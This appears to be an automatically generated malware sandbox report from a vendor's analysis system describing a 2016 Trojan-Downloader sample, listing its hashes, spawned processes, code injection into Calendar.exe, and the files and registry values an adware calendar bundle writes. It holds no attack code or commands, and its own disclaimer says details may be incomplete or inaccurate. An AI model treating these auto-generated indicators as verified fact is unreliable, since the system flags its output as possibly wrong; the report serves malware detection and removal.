Gen.Variant.Zusy.178812_5ef2c67ca0

by malwarelabrobot on May 4th, 2016 in Malware Descriptions.

Trojan-Downloader.Win32.Agent.wtkzi (Kaspersky), Gen:Variant.Zusy.178812 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 5ef2c67ca0d12eac12e1f3db9dd7ddc3
SHA1: c53635e5603d37eb8c95b2027ab52a4e068391b3
SHA256: 1d7fc913b8190e48f0f38f5844cbcd5455f7ea251d447b0d2238b4648c653492
SSDeep: 24576:V6Yi atnhL9tsEyi xhtPl NcsJupQqku14w4:of gnhL9NyX4qsupn4
Size: 955891 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-12-27 07:38:55
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

imapi.exe:1932
InstallHelper.exe:3084
InstallHelper.exe:3480
nst6.tmp.exe:2736
nst6.tmp.exe:2804
CalendarServ.exe:3180
CalendarServ.exe:3156
yeaplayer_br_ibd_bundle.exe:2328
%original file name%.exe:1216
rundll32.exe:1976
setup.exe:1948
setup.exe:348
291734.exe:2712

The Trojan injects its code into the following process(es):

Calendar.exe:3428

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process imapi.exe:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\g5z08pj0.TMP (146970 bytes)

The process InstallHelper.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)

The process InstallHelper.exe:3480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (170 bytes)

The process nst6.tmp.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Documents\Tools\Common\I18N\conf.db (759 bytes)

The process CalendarServ.exe:3180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)

The process CalendarServ.exe:3156 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (170 bytes)

The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (24 bytes)
C:\MINI.LOG (5089 bytes)
%Documents and Settings%\All Users\Documents\Guid\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (27681 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6 (0 bytes)

The process %original file name%.exe:1216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P5SDE3AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYJ45YV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KWD5RP0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QY4FSATI\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)

The process setup.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11075\51486_a.xml (8672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\cookies (188 bytes)
%Documents and Settings%\%current user%\Application Data\YeaPlayer_br_IBD_Bundle.exe (4185 bytes)

The process Calendar.exe:3428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (340 bytes)

The process 291734.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_pressed.png (172 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Festival.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_color.png (440 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarEntry.dll (4316 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_grey.png (248 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashUL.exe (8165 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival.json (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_hover.png (174 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_pressed.png (189 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_normal.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_half.png (217 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_normal.png (481 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_up.png (132 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Festival.json (16 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_hover.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Report.exe (5902 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_unselect.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_frame.png (1260 bytes)
%Program Files%\CalendarTool\2.0.0.11189\calendar.exe (47962 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_classsic.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_half.png (443 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReport.exe (16453 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_normal.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Festival.json (12 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPKernel.dll (23698 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Language.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_normal.png (177 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_normal.png (994 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_disabled.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_hover.png (993 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero1.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_hover.png (949 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_grey.png (452 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_down.png (131 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Festival.json (15 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_normal.png (519 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_hover.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival_special.json (6 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_modern.png (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_color.png (235 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_color.png (606 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPConfig.ini (234 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_menu.png (989 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_half.png (348 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_color.png (509 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_grey.png (417 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPNet.dll (11930 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPHelp.dll (10720 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReportModuleConf.ini (673 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_normal.png (955 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPDR.dll (10408 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\skin.xml (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Config.json (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\scroll.bmp (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_pressed.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_half.png (307 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_bottom.png (8 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_main.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPTask.dll (13763 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_grey.png (576 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)

Registry activity

The process imapi.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 D1 1C CB 70 45 7A A0 D0 0B 82 18 85 7F 8C 74"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi]
"ControlFlags" = "1"
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi\ImapiSvc]
"BitNames" = " ImapiDebugError ImapiDebugWarning ImapiDebugTrace ImapiDebugInfo ImapiDebugX ImapiDebugSort"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi\ImapiSvc]
"Guid" = "8107d8e9-e323-49f5-bba2-abc35c243dca"

The process InstallHelper.exe:3084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Control\TimeZoneInformation]
"ActiveTimeBias" = "4294967176"

[HKLM\SOFTWARE\CalendarTool]
"Version" = "2.0.0.11189"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\CalendarTool\INSTALL_MARK]
"Version" = "2.0.0.11189"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallHelper\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"UninstallString" = "%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe -Uninstall English"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\CalendarTool]
"PartnerId" = "YeaPlayer|br|IBD|Bundle"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayIcon" = "%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\CalendarTool]
"INSTALL_FIRST_TIME" = "2016-05-03_04:55:47"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayFullVersion" = "2.0.0.11189"

[HKLM\SOFTWARE\CalendarTool]
"UserId" = "61807c4bafc26bb2ed98e3e60f587cd6"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 5D 7F D0 86 D4 C2 1B B5 7E 30 04 72 D5 B9 A4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\CalendarTool]
"FrID" = "ClwS01UkXONz6DdlNQFq0y97Bu1dKUCqMKc="

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayVersion" = "2.0.0.11189"
"Publisher" = "MEIXIAN XIE"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayName" = "Advanced Calendar 2.0.0.11189"

[HKLM\SOFTWARE\CalendarTool]
"parentName" = "setup.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\SOFTWARE\CalendarTool\2.0.0.11189]
"install_path" = "%Program Files%\CalendarTool\2.0.0.11189"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallHelper\DEBUG]
"Trace Level"

The process InstallHelper.exe:3480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 51 D7 E3 70 D0 78 6F A0 B2 1E 2B 0F 84 47 49"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process nst6.tmp.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 09 35 66 49 82 C4 B6 06 8B 85 05 2C 1E B8 CE"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nst6.tmp\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nst6.tmp\DEBUG]
"Trace Level"

The process nst6.tmp.exe:2804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\CalendarTool\QUIT]
"QuitSession" = "{0A3A8827-4F83-49DA-9BB3-1E089656E7AC}-1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 AE 47 DD 19 BB A4 13 6E DE A7 71 AB E9 3B F7"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process CalendarServ.exe:3180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

